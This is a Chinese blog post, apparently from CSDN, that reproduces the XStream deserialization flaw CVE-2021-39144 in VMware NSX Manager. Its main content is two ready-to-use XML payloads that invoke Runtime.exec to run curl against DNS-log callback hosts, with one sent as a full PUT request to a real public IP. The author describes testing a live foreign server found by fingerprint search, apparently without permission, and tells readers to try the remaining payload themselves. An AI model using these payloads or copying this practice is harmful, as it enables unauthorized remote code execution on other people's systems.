VMware NSX Manager XStream unauthenticated反序列化漏洞 CVE-2021-39144 已亲自复现

已于 2024-01-08 16:01:28 修改
阅读量561 收藏 9
点赞数 9
分类专栏: XStream 文章标签: 网络安全
于 2023-12-26 00:50:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42430287/article/details/135173328
版权

VMware NSX Manager XStream unauthenticated 反序列化漏洞 CVE-2021-39144 已亲自复现

漏洞名称

漏洞描述

在Unmarshalling Time处包含用于重新创建前一对象的类型信息。XStream基于这些类型的信息创建新实例。攻击者可以控制输入流并替换或注入对象,这会导致在服务器上执行本地命令。

影响版本

XStream <= 1.4.17

漏洞复现

环境搭建

title="VMware Appliance Management"

找不到线下的环境,国外线上环境测试,访问页面。
在这里插入图片描述

漏洞利用

PUT /api/2.0/services/usermgmt/password/abc HTTP/1.1
Host: 45.11.217.69
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 558

<java.util.PriorityQueue serialization="custom">
    <unserializable-parents/>
    <java.util.PriorityQueue>
        <default>
            <size>2</size>
        </default>
        <int>3</int>
        <dynamic-proxy>
            <interface>java.lang.Comparable</interface>
            <handler class="sun.tracing.NullProvider">
                <active>true</active>
                <providerType>java.lang.Comparable</providerType>
                <probes>
                    <entry>
                        <method>
                            <class>java.lang.Comparable</class>
                            <name>compareTo</name>
                            <parameter-types>
                                <class>java.lang.Object</class>
                            </parameter-types>
                        </method>
                        <sun.tracing.dtrace.DTraceProbe>
                            <proxy class="java.lang.Runtime"/>
                            <implementing__method>
                                <class>java.lang.Runtime</class>
                                <name>exec</name>
                                <parameter-types>
                                    <class>java.lang.String</class>
                                </parameter-types>
                            </implementing__method>
                        </sun.tracing.dtrace.DTraceProbe>
                    </entry>
                </probes>
            </handler>
        </dynamic-proxy>
        <string>curl http://hernandez.wagner-jackson.martin-barnes.com</string>
    </java.util.PriorityQueue>
</java.util.PriorityQueue>

在这里插入图片描述
查看DNS Log成功获取命令执行结果,如图:
在这里插入图片描述
测试到此为止,线上环境。其余payload自行测试。

payloa2

Content-Type: application/xml

<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class='sun.tracing.NullProvider'>
<active>true</active>
<providerType>java.lang.Comparable</providerType>
<probes>
<entry>
<method>
<class>java.lang.Comparable</class>
<name>compareTo</name>
<parameter-types>
<class>java.lang.Object</class>
</parameter-types>
</method>
<sun.tracing.dtrace.DTraceProbe>
<proxy class='java.lang.Runtime'/>
<implementing__method>
<class>java.lang.Runtime</class>
<name>exec</name>
<parameter-types>
<class>java.lang.String</class>
</parameter-types>
</implementing__method>
</sun.tracing.dtrace.DTraceProbe>
</entry>
</probes>
</handler>
</dynamic-proxy>
<string>curl http://2345.mjo1hm.ceye.io</string>
</java.util.PriorityQueue>
</java.util.PriorityQueue>

修复建议

XStream 任意代码执行漏洞—关注厂商的主页以获取最新版本1.4.19
补丁链接:https://x-stream.github.io/download.html

总结

如果攻击成功,在响应头中返回的状态码为400,响应体无回显。

Bolgzhang
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【WEB安全】Xstream最新反序列化poc执行报错问题
hhhhhggghbhh的博客
12-13 610
最近有个需求,用Xstream反序列化打个内存马,从通用性来讲,肯定用1.4.17的洞去打应用范围最广。众所周知,Xstream官方会提供其漏洞的poc。在我实验之下,1.4.17的几个poc只要涉及到任意java代码执行的都会报错,纯调用java.lang.Runtime.exec()的却不会报错。在我调试之下发现了其奥秘,本文就是解决Xstream任意java代码执行报错的问题。
Xstream反序列化分析(CVE-2021-39149)
最新发布
zkaqlaoniao的博客
01-04 610
前几个月XStream爆出一堆漏洞,这两天翻了翻,发现这波洞应该是黑名单绕过的最后一波了。因为在最新版的XStream 1.4.18中已经默认开启白名单的安全框架,按照XStream官方补漏洞的习惯,应该不会再接受新的绕过黑名单的漏洞了。
近两年常用的RCE漏洞收集
Websec
04-11 5433
1、Spring Cloud RCE CVE-2022-22965 https://github.com/fullhunt/spring4shell-scan log4j漏洞: https://github.com/fullhunt/log4j-scan/blob/master/log4j-scan.py 2、weblogic反序列化 WeblogicScan:https://github.com/rabbitmask/WeblogicScan 3、shiro反序列化 shiroExploit:https:
python爬虫爬美女图片:“小甲鱼056节轮一只爬虫的自我修养4:OOXX” 最终更新2021.6.27日,更新后可用!!!
Alocus的博客
10-25 8582
需要改动有两个方面: 第一方面,网址编码有变化,如http://jandan.net/ooxx/MjAyMDEwMjUtODY=#comments,尾部的为base64编码,在网址构造时对应处使用base64编码.即可。 第二方面,图片地址发生了小改变,只需要将图片地址加入列表时,增加 http:即可。 代码如下 import urllib.request import os import base64 def url_open(url): opener = urllib.req...
NSX 6.3.5 VMware-NSX-Manager-6.3.5-7119875.ova
07-29
由于文件太大,该下载附件内附的是百度云盘的下载地址 里面包含nsx 6.3.5的安装包和安装文档,一站式安装
VMware NSX-T 3.0 OVA文件nsx-unified-appliance-3.0.0.0.0.15946739.ova
10-13
VMware NSX-T 3.0 OVA文件nsx-unified-appliance-3.0.0.0.0.15946739.ova
VMware-NSX-Manager-6.4.0-7564187.ova
06-27
VMware-NSX-Manager-6.4.0-7564187.ova BT种子地址。最新版本NSX for vsphere下载
VMware NSX原理与实践------逻辑交换(三).docx
09-29
今天的内容主要讲的是VMware NSX原理与实践------逻辑交换(三)的相关知识,希望大家通过我的讲解,可以对这方面的知识有一个初步的了解,如果在这个过程中能激发自己的学习乐趣,那么便是我所做的最大贡献了
VMware NSX原理与实践----NSX防火墙详解(一).txt
02-22
VMware NSX原理与实践----NSX防火墙详解(一) 该文档清楚的讲解了NSX防火墙的原理、架构、功能等等,可以帮助新手最快地上手,有利于初学者能够在最短的时间内对NSX 防火墙的学习有一个长足的进步
Web日志安全分析技巧
06-24 3585
ox01 Web日志Web访问日志记录了Web服务器接收处理请求及运行时错误等各种原始信息。通过对WEB日志进行的安全分析,不仅可以帮助我们定位攻击者,还可以帮助我们还...
XStream < 1.4.20 栈缓冲区溢出漏洞
OSCS开源安全社区
12-29 2250
OSCS(开源软件供应链安全社区)通过最快、最全的方式,发布开源项目最新的安全风险动态,包括开源组件安全漏洞、事件等信息。XStream 是一个轻量级的、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。在使用集合和映射的哈希码来实现强制递归哈希计算时,远程攻击者可以通过栈缓冲区溢出的错误来终止应用程序造成拒绝服务攻击。在1.4.20之前的版本中存在栈缓冲区溢出漏洞,从而导致通过操纵已处理的输入流来造成拒绝服务。该漏洞已存在 POC。
腾讯蓝军安全通告:XStream修复14个安全漏洞
Tencent_SRC的博客
08-23 1097
文|腾讯蓝军1. 漏洞概述近日XStream官方发布重要安全更新,修复了14个安全漏洞,其中5个严重漏洞由TSRC向XStream官方报告,通过这些漏洞,攻击者构造特定的XML数据,可...
java XStream更新
编程技术提升
03-29 3081
漏洞详情 XStream 是一个常用的 Java 对象和 XML 相互转换的工具。近日 XStream 官方发布安全更新,修复了高危和严重漏洞如下: Version 1.4.17 CVE-2021-39139 任意代码执行漏洞 CVE-2021-39140 可能导致拒绝服务 CVE-2021-39141 任意代码执行漏洞 CVE-2021-39144 远程命令执行漏洞 CVE-2021-39145 任意代码执行漏洞 CVE-2021-39146 任意代码执行漏洞 CVE-2021-39147 任意代码执行漏
Xstream漏洞复现CVE-2021-29505)
Ashely的博客
09-24 3210
Vulhub漏洞环境搭建 拉取漏洞镜像 复现漏洞 一、Vulhub漏洞环境搭建 详见文章Vulhub靶场搭建(Centos7) 二、拉取漏洞镜像 1.进入到vulhub/Xstream/CVE-2021-29505目录下,执行 docker-compose up -d 等待拉取镜像。(默认拉取镜像速度很慢,建议换源,可参考https://blog.csdn.net/weixin_30565327/article/details/101108079) 2. ...
『Java安全』XStream 1.4-1.4.6&1.4.10反序列化漏洞CVE-2013-7285复现与浅析
Ho1aAs‘s Blog
08-12 1910
# 漏洞简介 当XStream反序列化了一个动态代理类,再调用该动态代理类所声明的接口的方法时,就能够触发任意命令执行 > XStream序列化和反序列化分析:https://ho1aas.blog.csdn.net/article/details/126250860 > 动态代理:https://ho1aas.blog.csdn.net/article/details/121647387 # 影响版本 XStream 1.4-1.4.6、1.4.10............
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8452
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值